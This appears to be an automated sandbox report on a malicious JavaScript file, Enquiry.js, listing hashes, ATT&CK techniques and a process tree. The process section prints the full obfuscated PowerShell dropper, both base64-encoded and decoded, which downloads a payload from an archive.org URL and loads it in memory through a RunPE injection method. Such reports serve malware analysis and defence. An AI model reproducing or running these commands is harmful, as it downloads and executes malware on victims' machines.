9446ab8aeba470c63142ab986f9023bf8b1a786baea6ff43ceaf3d945e9c8976

General

Target

Enquiry.js
Size

319KB
MD5

9234f26f1ef7e053de47d6b1e4e02827
SHA1

f110e7a8c7d4b65491be0393ead6bc9c9620bef0
SHA256

9446ab8aeba470c63142ab986f9023bf8b1a786baea6ff43ceaf3d945e9c8976
SHA512

62091b83f6feda8f7cff0655149a3c2d6d7c4203b1064f52f670ffd759d0ce97ca243a87084b6f6fe2be96a8576d57488795844202c5210e577899e341225c7e
SSDEEP

6144:zze4Z2bN0IWqH8dEHLQp57QBH/8vGwp749Og3JWacMnmockYAOkrW9vvplZcF:e4Z2bN0gH8irQp5EBf8vGwp74AgJ4qm6

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2944	powershell.exe
6	2944	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2944	powershell.exe
2580	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2580	powershell.exe
2944	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	2944	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2104 wrote to memory of 2580	2104	wscript.exe	30
PID 2104 wrote to memory of 2580	2104	wscript.exe	30
PID 2104 wrote to memory of 2580	2104	wscript.exe	30
PID 2580 wrote to memory of 2944	2580	powershell.exe	32
PID 2580 wrote to memory of 2944	2580	powershell.exe	32
PID 2580 wrote to memory of 2944	2580	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Enquiry.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAgACgAIAAkAEUAbgB2ADoAQwBPAE0AUwBQAEUAYwBbADQALAAyADYALAAyADUAXQAtAEoATwBpAG4AJwAnACkAIAAoACgAKAAnAFEAVgBXAHUAcgBsACAAPQAgACcAKwAnAE0ARwBLACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAJwArACcAcwAnACsAJwA6AC8AJwArACcALwBpAGEAOQAwADQANgAnACsAJwAwACcAKwAnADEAJwArACcALgB1ACcAKwAnAHMALgAnACsAJwBhAHIAYwAnACsAJwBoAGkAdgBlAC4AbwByAGcAJwArACcALwA2AC8AJwArACcAaQB0AGUAJwArACcAbQBzACcAKwAnAC8AZABlAHQAYQBoAC0AJwArACcAbgBvAHQAZQAtAGoALwBEAGUAdABhAGgAJwArACcATgAnACsAJwBvAHQAJwArACcAZQBKAC4AdAB4AHQATQBHAEsAOwAnACsAJwBRAFYAVwBiACcAKwAnAGEAJwArACcAcwBlACcAKwAnADYANABDACcAKwAnAG8AbgB0AGUAJwArACcAbgB0ACAAPQAgACcAKwAnACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzACcAKwAnAHQAZQAnACsAJwBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAnACsAJwApAC4AJwArACcARAAnACsAJwBvAHcAbgBsAG8AJwArACcAYQBkAFMAJwArACcAdAByACcAKwAnAGkAJwArACcAbgBnACgAUQBWACcAKwAnAFcAJwArACcAdQAnACsAJwByACcAKwAnAGwAKQAnACsAJwA7ACcAKwAnAFEAVgBXAGIAJwArACcAaQAnACsAJwBuACcAKwAnAGEAcgB5AEMAbwBuACcAKwAnAHQAJwArACcAZQBuAHQAJwArACcAIAA9ACAAJwArACcAWwBTAHkAJwArACcAcwB0AGUAbQAnACsAJwAuAEMAJwArACcAbwBuAHYAZQByAHQAJwArACcAXQA6ACcAKwAnADoARgAnACsAJwByAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAJwArACcAcgBpAG4AZwAoAFEAJwArACcAVgBXACcAKwAnAGIAYQBzACcAKwAnAGUANgA0AEMAbwBuACcAKwAnAHQAJwArACcAZQBuAHQAJwArACcAKQA7ACcAKwAnAFEAVgBXAGEAcwAnACsAJwBzAGUAJwArACcAbQBiAGwAeQAgAD0AIAAnACsAJwBbACcAKwAnAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBACcAKwAnAHMAcwAnACsAJwBlAG0AJwArACcAYgBsAHkAXQA6ACcAKwAnADoAJwArACcATABvAGEAJwArACcAZAAoAFEAJwArACcAVgBXACcAKwAnAGIAaQBuACcAKwAnAGEAcgB5AEMAbwAnACsAJwBuAHQAJwArACcAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQA7AFEAVgBXAHQAeQBwAGUAIAA9ACAAUQBWAFcAYQBzAHMAZQAnACsAJwBtAGIAbAAnACsAJwB5ACcAKwAnAC4ARwAnACsAJwBlACcAKwAnAHQAVAB5AHAAZQAoAE0ARwBLAFIAdQBuAFAAJwArACcARQAuACcAKwAnAEgAbwBtAGUATQBHAEsAKQA7AFEAVgAnACsAJwBXAG0AJwArACcAZQB0AGgAbwBkACAAPQAgAFEAVgAnACsAJwBXAHQAeQBwACcAKwAnAGUALgAnACsAJwBHAGUAJwArACcAdAAnACsAJwBNAGUAJwArACcAdABoACcAKwAnAG8AZAAnACsAJwAoAE0ARwBLACcAKwAnAFYAQQBJACcAKwAnAE0ARwBLACkAOwBRAFYAVwAnACsAJwBtACcAKwAnAGUAdABoAG8AZAAnACsAJwAuAEkAbgB2ACcAKwAnAG8AJwArACcAawBlACgAUQBWAFcAJwArACcAbgB1AGwAbAAsACAAWwBvAGIAJwArACcAagBlAGMAdAAnACsAJwBbAF0AXQBAACcAKwAnACgAJwArACcATQBHACcAKwAnAEsAdAAnACsAJwB4AHQALgBpACcAKwAnAG4AbgBpAHcAJwArACcALwAnACsAJwB2AGUAJwArACcAZAAuADIAJwArACcAcgAuADMAOQBiADMAJwArACcANAAnACsAJwA1ADMAMAAnACsAJwAyAGEAJwArACcAMAA3ADUAYgAxAGIAJwArACcAYwAnACsAJwAwACcAKwAnAGQANAA1AGIANgAzADIAJwArACcAZQBiADkAZQBlADYAMgAtACcAKwAnAGIAJwArACcAdQAnACsAJwBwAC8AJwArACcALwAnACsAJwA6AHMAcAB0ACcAKwAnAHQAaABNAEcASwAgACwAIABNACcAKwAnAEcASwBkAGUAJwArACcAcwAnACsAJwBhAHQAJwArACcAaQAnACsAJwB2AGEAJwArACcAZAAnACsAJwBvACcAKwAnAE0ARwBLACcAKwAnACAALAAgACcAKwAnAE0ARwAnACsAJwBLAGQAZQBzAGEAdABpAHYAYQBkAG8AJwArACcATQAnACsAJwBHACcAKwAnAEsAIAAnACsAJwAsACAAJwArACcATQBHACcAKwAnAEsAZABlAHMAYQB0ACcAKwAnAGkAdgBhAGQAbwBNAEcASwAnACsAJwAsAE0AJwArACcARwBLAEEAJwArACcAZABkAEkAbgBQAHIAbwBjACcAKwAnAGUAcwBzADMAMgAnACsAJwBNAEcASwAsAE0ARwBLAGQAZQBzAGEAdABpAHYAYQBkAG8AJwArACcATQBHAEsAKQAnACsAJwApADsAJwApACAAIAAtAHIAZQBwAEwAQQBjAGUAIAAgACgAWwBDAGgAYQByAF0AOAAxACsAWwBDAGgAYQByAF0AOAA2ACsAWwBDAGgAYQByAF0AOAA3ACkALABbAEMAaABhAHIAXQAzADYAIAAtAEMAcgBFAFAATABBAGMARQAgACAAJwBNAEcASwAnACwAWwBDAGgAYQByAF0AMwA5ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $Env:COMSPEc[4,26,25]-JOin'') ((('QVWurl = '+'MGK'+'ht'+'t'+'p'+'s'+':/'+'/ia9046'+'0'+'1'+'.u'+'s.'+'arc'+'hive.org'+'/6/'+'ite'+'ms'+'/detah-'+'note-j/Detah'+'N'+'ot'+'eJ.txtMGK;'+'QVWb'+'a'+'se'+'64C'+'onte'+'nt = '+'(New-Object Sys'+'te'+'m.Net.WebClient'+').'+'D'+'ownlo'+'adS'+'tr'+'i'+'ng(QV'+'W'+'u'+'r'+'l)'+';'+'QVWb'+'i'+'n'+'aryCon'+'t'+'ent'+' = '+'[Sy'+'stem'+'.C'+'onvert'+']:'+':F'+'ro'+'mBase64St'+'ring(Q'+'VW'+'bas'+'e64Con'+'t'+'ent'+');'+'QVWas'+'se'+'mbly = '+'['+'Reflection.A'+'ss'+'em'+'bly]:'+':'+'Loa'+'d(Q'+'VW'+'bin'+'aryCo'+'nt'+'e'+'n'+'t'+');QVWtype = QVWasse'+'mbl'+'y'+'.G'+'e'+'tType(MGKRunP'+'E.'+'HomeMGK);QV'+'Wm'+'ethod = QV'+'Wtyp'+'e.'+'Ge'+'t'+'Me'+'th'+'od'+'(MGK'+'VAI'+'MGK);QVW'+'m'+'ethod'+'.Inv'+'o'+'ke(QVW'+'null, [ob'+'ject'+'[]]@'+'('+'MG'+'Kt'+'xt.i'+'nniw'+'/'+'ve'+'d.2'+'r.39b3'+'4'+'530'+'2a'+'075b1b'+'c'+'0'+'d45b632'+'eb9ee62-'+'b'+'u'+'p/'+'/'+':spt'+'thMGK , M'+'GKde'+'s'+'at'+'i'+'va'+'d'+'o'+'MGK'+' , '+'MG'+'Kdesativado'+'M'+'G'+'K '+', '+'MG'+'Kdesat'+'ivadoMGK'+',M'+'GKA'+'ddInProc'+'ess32'+'MGK,MGKdesativado'+'MGK)'+');') -repLAce ([Char]81+[Char]86+[Char]87),[Char]36 -CrEPLAcE 'MGK',[Char]39))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
60f1022b9c1fe30b1b2c9f54310e3e39

SHA1
a37de25e6019d73a90a2406003643597cdc43ccb

SHA256
d4cf9ae7ffd1f0478b374e8f45c0bd564be62227d913ff5dcf19ff3fccdb4dd3

SHA512
1ce7b6527183059288cc0c2620ee3c79cb3b3f4b8529a155460d6f5960d5efd9487eb75156652f6b071d504227cde34704c8ffbd05ce896836168e9f3f2a14ac

Download Submit
memory/2580-4-0x000007FEF5C0E000-0x000007FEF5C0F000-memory.dmp

Filesize
4KB

Download
memory/2580-5-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2580-6-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2580-8-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2580-7-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/2580-9-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2580-11-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2580-10-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2580-17-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing